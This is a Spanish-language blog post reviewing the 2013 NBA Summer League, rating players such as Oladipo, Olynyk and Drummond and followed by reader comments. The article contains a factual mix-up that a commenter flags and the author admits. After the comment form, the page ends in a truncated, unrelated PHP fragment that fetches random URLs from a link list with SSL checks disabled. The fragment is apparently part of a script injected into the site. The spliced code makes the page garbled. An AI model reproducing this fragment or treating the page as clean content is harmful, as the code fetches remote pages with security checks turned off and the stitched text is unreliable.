Repaso general de las Summer Leagues

25 de July de 2013 por rumbero
Una vez finalizados los torneos de Orlando y Las Vegas toca hacer un repaso general de aquellos jugadores que más han destacado o más nos han llamado la atención en esta Summer League, ya sea por su buen buen nivel de juego, el potencial que puedan tener o el número de mandarinas por minuto que hayan llegado a tirarse.

Recordamos a los navegantes que la SL es lo que es, y si alguno de vosotros escoge en la fantasy de turno a fulanito porque lo dejábamos por las nubes y ha sido un auténtico pufo, no se aceptarán reclamaciones a final de temporada 😀

Destacados

Victor Oladipo (Orlando Magic): Una de las sensaciones del torneo. 19 puntos, 4.3 rebotes, 5 asistencias, 3 robos y 4.8 pérdidas en 32 minutos. Todo esto jugando casi todos los partidos como PG que recordemos no es su puesto. Gran capacidad atlética, mucha intensidad en ambos lados, sorprendentemente acertado desde el tiro de 3P aunque bastante menos fino en el % FG (0.375) pero sin rehuir la responsabilidad y asumiendo decisiones y tiros importantes (recordemos el gamme winner en la cara de MCW). Además su progresión y la seguridad de minutos que va a tener en Orlando hace pensar que va a empezar a rendir desde ya. 

Kelly Olynyk (Boston Celtics): El MVP de la Summer League de Orlando habrá cerrado algunas bocas que lo tenían sólo por un blandurrio con poco futuro. Ha sido uno de las mejores demostraciones ofensivas de la SL. Buen juego de espaldas, gran manejo de balón, una amenaza desde la media distancia y el triple, bien en el rebote ofensivo y no se ha mostrado como un mal pasador. Técnicamente es muy bueno con la altura que tiene, aunque le falta músculo y defensa… Lo pasará mal con los grandotes pero es más fácil obtener lo último que el talento para jugar a esto. Ha promediado 18 puntos (57.8% FG), 7.8 rebotes, 2.4 asistencias en apenas 24 minutos.

Terrence Jones (Houston Rockets): Al sophomore se le vio activo en todos los partidos a sabiendas que el puesto de 4 no tiene plaza fija en los Rockets. Escogido en el mejor quinteto de Orlando se fue a los 15.8 puntos (0.42% FG) y 7 rebotes dando muestras de ese talento con varias canastas en uno contra uno marca de la casa.

Reggie Jackson & Jeremy Lamb (Oklahoma Thunder): El base sólo jugó dos partidos pero el que hizo contra Detroit vale para ponerlo aquí. 35 puntos en 29 minutos, 23 de los cuales fueron en el último cuarto para remontar el partido. Lamb promedió 18 en 31 minutos y mostrando en todos los partidos la amenaza de su tiro. Ambos deberían ganar protagonismo esta temporada en unos Thunder huérfanos de una tercera vía anotadora.

Andre Drummond (Detroit Pistons): Sobrado no, lo siguiente. 15.5 puntos y 14.8 rebotes en 29.5 minutos. Si la temporada pasada ya dio muestras del dominio que puede tener en la pintura, en esta SL se le ha quedado bastante pequeña. Esperemos que la llegada de Josh Smith no le quite demasiados minutos porque ahora mismo su evolución no tiene techo. Sigue siendo un auténtico desastre en los TL (33%)

CJ McCollum (Portland Trail Blazers): Jugón de lo buenos, o al menos ha dado esa impresión en estos partidos. Gran anotador, rápido en el primer paso y aprovechando los bloqueos, sin miedo entrando a canasta como probando desde 3 puntos. 21 puntos, 4 rebotes y 3.4 asistencias en 36 minutos. Cierto es que por momentos ha acaparado totalmente el juego ofensivo de los Blazers pero muchas veces con resultados brillantes como el último cuarto contra Chicago con triplazo para empatar el partido. Lo pasa peor en defensa en parte por su físico pero con que les salga la mitad de bueno de lo que ha apuntado en el torneo ya habrá sido un buen robo de los Blazers.

Jeff Taylor (Charlotte Bobcats): Solidísima su actuación en la SL. Se ha ganado a pulso entrar en el mejor quinteto de Las Vegas promediando 20 puntos en 31 minutos con un más que bueno 0.475% en FG y 0.36% en 3P. Jugando así no nos debería extrañar verlo más minutos en pista esta temporada y más con su buena defensa.

Cody Zeller (Charlotte Bobcats): Una de las sorpresas más positivas sin duda. Mucho recelo ha habido con su elección y antes de ponerse a jugar ya se había llevado palos por todos lados. 16.3 puntos (52% FG) y 9.30 rebotes en 32 minutos. Mucha movilidad y recursos cerca del aro. Le pasa como a Olynyk y en defensa lo va a pasar bastante peor, pero parece que la calidad que solemos echar en falta con los hombres grandes la tiene.

Austin Rivers (New Orleans Pelicans): Lo mejor de Rivers en este torneo ha sido la regularidad que ha demostrado en todos los partidos siendo siempre la referencia ofensiva del equipo y promediando 18.2 puntos, 2.3 rebotes y 2.6 asistencias en 33 minutos. Sigue necesitando mucho el balón y su defensa es floja. Veremos si tiene hueco en este backcourt de los Pelicans pero al menos hemos visto algo de luz con él después de su primer año NBA.

Ken Bazemore (Golden State Warriors): Para muchos el auténtico MVP de la Summer League de las Vegas. Si los Warriors han ganado el torneo ha sido en gran medida por el liderazgo y las ganas que le ha puesto Bazemore (ayudado por otro tío al que no le faltan eggs como es Draymond Green). 18.4 puntos, 4.6 rebotes y 3 asistencias en 20 minutos. Mucha intensidad y excelente defensa. Está para más que agitar toallas con su tamaño y polivalencia para ocupar posiciones y más corriendo gente por ahí como Toney Douglas…

Marcus Morris & Markieff Morris (Phoenix Suns): Otros que se han tomado el torneo bastante en serio para intentar ganarse un puesto en estos Suns que ahora mismo andan en reconstrucción. Más jugón Marcus y más trabajador en la pintura Markieff aunque también le gusta jugar por fuera, forman una buena dupla. No les falta intensidad en el rebote ni ganas.

John Henson (Milwaukee Bucks): Ya le pusimos en su momento la etiqueta de “jugador con potencial” y de momento sigue por esa línea. Una auténtica bestia en la pintura: 14.7 puntos, 13.7 rebotes y 3 chapas en 27 minutos también es capaz de hincharse a perder balones tontos. Buen defensor, le faltan muchos fundamentos que suple con los brazacos que tiene y su capacidad atética, aunque le faltan kilos de músculo. Con un poco más de progresión la pareja con Sanders puede ser más que interesante.

Jonas Valanciunas (Toronto Raptors): El discutible MVP del torneo de Las Vegas. 18 puntos y 10 rebotes de media en 30 min. Ha jugado bastante sobrado y eso (y el pandero que gasta el amigo) también le han valido para perder 5 balones por partido. Ya hemos comentado que físicamente está mucho más…fuerte. Debe ser su temporada de despegue.

Ian Clark (Miami Heat y Golden State Warriors): Un crack. Esa buena mano nos conquistó desde el primer día. Lo hizo de maravilla con los Heat en la SL de Orlando y con los Warriors igual saliéndose en la final con sus 33 puntos y su 7/10 desde el triple. Ha rondado el 50% en FG y triples en los dos torneos. No drafteado, sigue sin equipo.

Sorpresas y jugadores a seguir

Phil Pressey (Boston Celtics): Le seguimos la pista desde el primer día y al final su completa SL le ha valido para firmar por los verdes. 9.4 puntos, 2.2 rebotes, 6.6 asistencias, 2 robos y 4 pérdidas en apenas 23 minutos. Gran visión de juego (se fue a las 10 asistencias en los dos últimos partidos), aceptable anotador y buen defensor aunque lo puede pasar mal con bases grandes. Parece un buen recambio para dar descanso a Rondo.

Kentavious Caldwell-Pope (Detroit Pistons): Como tirador que vive de sus rachas empezó el torneo visiblemente nervioso y fallando muchísimos tiros relativamente cómodos, pero sus 3 últimos partidos fueron realmente buenos. Llegó al 50% en tiros de campo y se fue a los 18 puntos de media, demostrando además que es un buen reboteador para su estatura y empleándose en defensa aunque no sea su punto fuerte. De menos a más dejó un buen sabor de boca.

Rudy Gobert (Utah Jazz): Otro que fue mejorando conforme avanzaban los partidos. Acojona la planta y los brazos que tiene el chaval y eso se nota a la hora de intimidar en la pintura con sus 2.4 tapones de media. Gran reboteador, es muy limitado ofensivamente y convierte las que le llegan cerca del aro. Lo más sorprendente es su “velocidad” en transición y su buena mano para los TL (70%). Con unos kilos más veremos si se queda en un bicho de los que dan miedo o un tronco de los buenos.

Mason Plumlee (Indiana Pacers) & Miles Plumlee (Brooklyn Nets): Con 10 puntos, 9.5 rebotes y 3 chapas por partido no parece descabellado pensar que el mayor de los Plumlee pueda tener algunos minutos con la marcha de Psycho-T. Asegura rebotes y lucha en la pintura. Mientras, su hermano se ha ido a los 13.2 puntos y 7 rebotes en 29 minutos. Ofrece menos pelea pero parece tener más recursos ofensivos cerca del aro. Este en cambio lo va a tener bastante más complicado con Garnett y Evans por delante.

Tyshawn Taylor (Brooklyn Nets): 16.8 puntos, 3.3 rebotes y 3.5 asistencias en 20 minutos. Ya demostró en la SL de la anterior temporada y con la lesión de Deron durante la regular que no suele desaprovechar los minutos.

Steven Adams (Oklahoma Thunder): Después de su primer partido muchos aficionados de los Thunder ya estaban pensando:” Otro cacho carne a la vista”. La verdad es que se fue entonando bastante y acabó el torneo con 9 puntos y 6.5 rebotes de media en 29 minutos. Vive mucho de su físico, una gran ventaja en defensa y una ayuda en ataque para definir cerca del aro. Estaría bien que Perkins le enseñe algún movimiento de los suyos en el poste.

Archie Goodwin (Phoenix Suns): Apunta a robazo el joven Goodwin. Más nervioso en sus dos primeros partidos ha mostrado un excelente físico para atacar el aro y que le ayuda en defensa y una buena selección de tiro para 18 años que tiene el chaval. Su temporada Freshman había sido muy discreta pero con estos partidos se ha ganado que le sigamos la pista ante el margen de progresión que tiene y sabiendo que en estos Suns puede tener minutos para mejorar.

Dwight Buycks (Oklahoma Thunder y Toronto Raptors): Uno de nuestros preferidos desde el principio. Ya avisábamos después de sus partidos con los Thunder que el que ex jugador de la liga francesa la anterior temporada no tenía equipo y poco tardó Ujiri en reclutarlo para sus Raptors. Espectaculares sus dos partidos con ellos: Cerca del triple doble en uno: 18/6/10 y una auténtica máquina de anotar en el otro: 28/2/4. No esperamos eso de él en RS ni mucho menos pero se ha mostrado un base muy completo, más director de juego que anotador pero que no anda cojo en este aspecto si se le requiere.

Reggie Bullock (Los Angeles Clippers): Si los Clippers querían añadir un tirador más a su arsenal para esta temporada parece que la han clavado con él: 18 puntos y 4.2 rebotes en 32 minutos. Es de los que no se corta.

Tim Hardaway Jr (New York Knicks): Se lesionó en el segundo partido y nos ha dejado con ganas de verlo más. Buen manejo y rápido en el primer paso, eficaz atacando el aro, buen anotador y aportando intensidad. A ver lo que nos dejan verlo en los Knicks.

Lucas Nogueira & Dennis Schroeder & Mike Muscala (Atlanta Hawks): Bonito pack el de Atlanta. Alguno debería salirles bien por maneras y estadística. El base ha acabado el torneo con 10.8 puntos y 5.6 asistencias. Buen físico y habilidad para encontrar al compañero que está mejor colocado. A veces pierde posesiones por comerse el balón pero recordemos que cuenta con 19 años. Hay disparidad de opiniones pero desde aquí nos ha dado la sensación que hay jugador. A Nogueira ya lo conocemos pero ha sorprendido gratamente por su presencia en la pintura y eso que le falta físico y muchísima técnica. De Muscala posiblemente se esperaba algo más a nivel ofensivo pero no ha acabado de estar suelto en sus movimientos y su tiro de corta distancia.

Ray McCallum (Sacramento Kings): 12.6 puntos, 4.2 rebotes y 4 asistencias en 30 minutos. Bien con el manejo de balón (no pierde demasiados) y entrando a canasta, con un buen tiro de media distancia pero un muy mal tiro de 3P. Buen físico, igual no va a tener demasiados minutos en Sacramento.

Los Bulls: Uno de los equipos con más nombres a seguir. Primeramente nuestro amigo Goudelock que ha sido bendecido por los dioses en esta SL con 19 puntos de media y 0.47% FG y 0.52% en 3P. Veremos si encuentra hueco en algún equipo. Por otro lado excelente SL de Marquis Teague, cogiendo la responsabilidad anotadora cuando ha sido necesario y dirigiendo muy bien al equipo en las maravillosas rachas de tiro que han tenido. Deberíamos verle mucho más con las dudas de Rose y la marcha de Nate. Seguimos con Malcolm Thomas: 11 puntos y 15 rebotes en 33 minutos. Lo acaban de cortar los Bulls pero por un tío así debería interesarse más de un equipo. Finalmente nos quedamos con el proyecto de buen jugador que puede ser Tony Snell en las manos de Thibs. Un “Jimmy Butler 2”. Excelente físico y habilidades para jugar a esto. Ha promediado 11.8 puntos, 6.8 rebotes, 2.2 asistencias y 1.2 robos. Mucho ojo con él.

Decepciones

Michael Carter-Williams (Philadelphia 76ers): Fue el protagonista absoluto de los Sixers en la Summer League de Orlando canalizando la mayor parte del juego y eso le pesó demasiado en muchos momentos. Sus números no son para nada malos: 13.6 puntos, 4.2 rebotes, 6.8 asistencias y 2 robos en 31 minutos. El problema es cuando nos vamos a las 4.8 pérdidas por partido y a los porcentajes de tiro: 0.27% FG y 0.15% 3P que confirman que no es el mejor de los tiradores. A eso hay que sumarle malas decisiones como director de juego y canastas falladas y balones perdidos bastante incomprensibles. Repetimos, seguramente el protagonismo pudo con él teniéndose que jugar demasiados balones cuando su mejor virtud es la de asistir y dirigir el equipo. Por ahí tiene la excusa, habrá que verlo con sus compañeros aunque esta temporada los Sixers tampoco son para tirar cohetes.

Trey Burke (Utah Jazz): ¿Se puede tirar peor que MCW teniendo presumiblemente muchísimo más talento ofensivo? Burke demostró que sí. 8.8 puntos, 3.5 rebotes, 4 asistencias y 2.2 pérdidas en 26.8 min con un escalofriante 0.24% FG y 0.05% en 3P. Probablemente la mayor de las decepciones de esta SL teniendo en cuenta las miradas que había puestas en él y la aceptación general que Utah había conseguido un robazo con uno de los mayores talentos de este draft. Otro al que habrá que darle el beneficio de la duda de la presión y esperar que mejore en RS ya que no deberían faltarle minutos para mejorar.

Otto Porter (Washington Wizards): Cierto es que por culpa de problemas musculares le hemos visto poco pero en los 3 partidos que jugó se le vió bastante perdido y muy fallón en el tiro (0.33% FG). Siendo un número 3 esperábamos algo más pero por mucho que esté en proceso de adaptación de lo que se quiere de él.

Shabazz Muhammad (Minnesota Timberwolves): Podríamos coger los motivos por lo que le hemos puesto en distintas ocasiones en decepciones y veríamos que siempre vamos al mismo lugar. Acoplándose a un nuevo estilo de juego ha sido un híbrido de anotador y jugador de equipo y no ha conseguido ninguna de las 2 cosas. 8.5 puntos(36% FG) , 2.2 rebotes y 0.8 asistencias en 22 minutos.

Ben Mclemore (Sacramento Kings): No es justo del todo ponerlo en esta sección y soy el primero que lo sé. Ha alternado actuaciones horribles como la del 4/23 con otras realmente buenas. Hay talento y lo mejor de todo: no es sólo un tirador. Buena capacidad atlética, rápido en el primer paso atacando a canasta y buen defensor. El problema es que en la NBA lo vean como tal y sólo se dedique a tirar mandarinas. De todas formas un poco de entreno de muñeca este veranito le va a venir muy bien porque tela algunos tiros que le hemos visto…

Comenta

6 comentarios a esta entrada

  1. Esteban dice:
    #1

    ian clark firma con el Utha JAZZ, cuidado que hasta puede tener buenos minutos

    para que lloren, scott machado, cortado

    como aqui lo ven tan bueno y en la nba tan malo?

      Citar

  2. Esteban dice:
    #2

    “Estaría bien que Perkins le enseñe algún movimiento de los suyos en el poste.”

    jajaja muy bueno

      Citar

  3. Denise dice:
    #3

    Pedazo articulo Rumbero, de acuerdo en todo.

    A mi la SL para lo que mas me ha servido es para confirmar lo que muchos deciais, este Draft puede ser malo en cuanto que quizas no haya muchos futuros All-Stars en él, pero es profundisimo y a dia de hoy de los 45 primeros picks, apostaría que al menos 30 pueden ser jugadores que entren en la rotación de un equipo durante la proxima decada.

      Citar

  4. r_miller dice:
    #4

    Creo que Muhamad sera el nuevo Beasley, mucho talento pero a la hora de la verdad no ha demostrado nada. Si un teorico numero 1 del Draft en la Summer League hace estos numeros que va hacer contra Kobe, Harden, ni siguiera podria con Nick Young, no le veo futuro. Por otra parte creo que Oladipo nunca va a ser una estrella pero va a ser una pieza clave para que Orlando vuelva a ser candidato a titulo en 5 años

      Citar

  5. Sancho88 dice:
    #5

    Creo que Miles juega en Indiana y Mason en Nets. En el resumen está cambiado. No estoy de acuerdo con que McCallum tenga mala mano, en la universidad tiraba de cojones, y Malcolm Thomas debería venirse a Europa. Por segundo verano consecutivo lo peta en las summer leagues, pero este tío tiene pinta de jugador bueno en Europa, no lo veo en la NBA para nada. Por lo demás, excelente curro y resumen, de lo mejor que he visto por ahí. Enhorabuena rumbero

      Citar

  6. rumbero dice:
    #6

    Gracias majetes

    Sancho88:
    Creo que Miles juega en Indiana y Mason en Nets. En el resumen está cambiado. No estoy de acuerdo con que McCallum tenga mala mano, en la universidad tiraba de cojones, y Malcolm Thomas debería venirse a Europa. Por segundo verano consecutivo lo peta en las summer leagues, pero este tío tiene pinta de jugador bueno en Europa, no lo veo en la NBA para nada. Por lo demás, excelente curro y resumen, de lo mejor que he visto por ahí. Enhorabuena rumbero

    Si señor, los nombres de los Plumlee están cambiados….es una prueba que os había visto para ver si estáis atentos 😀 De McCallum digo que tiene buena mano e, lo que igual soy demasiado radical con su tiro de 3P cierto, pero es que prácticamente no lo ha intentado en toda la SL como si no se fiara. A mi me ha gustado bastante el chaval. Y si, seguramente llevás razón con lo d M. Thomas. Me pasa un poco igual con Jack Cooley. Les veo 10 minutitos en algún equipillo por ser unos reboteros de la leche, a lo Reggie Evans, pero les faltan fundamentos y algo de altura/físico

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>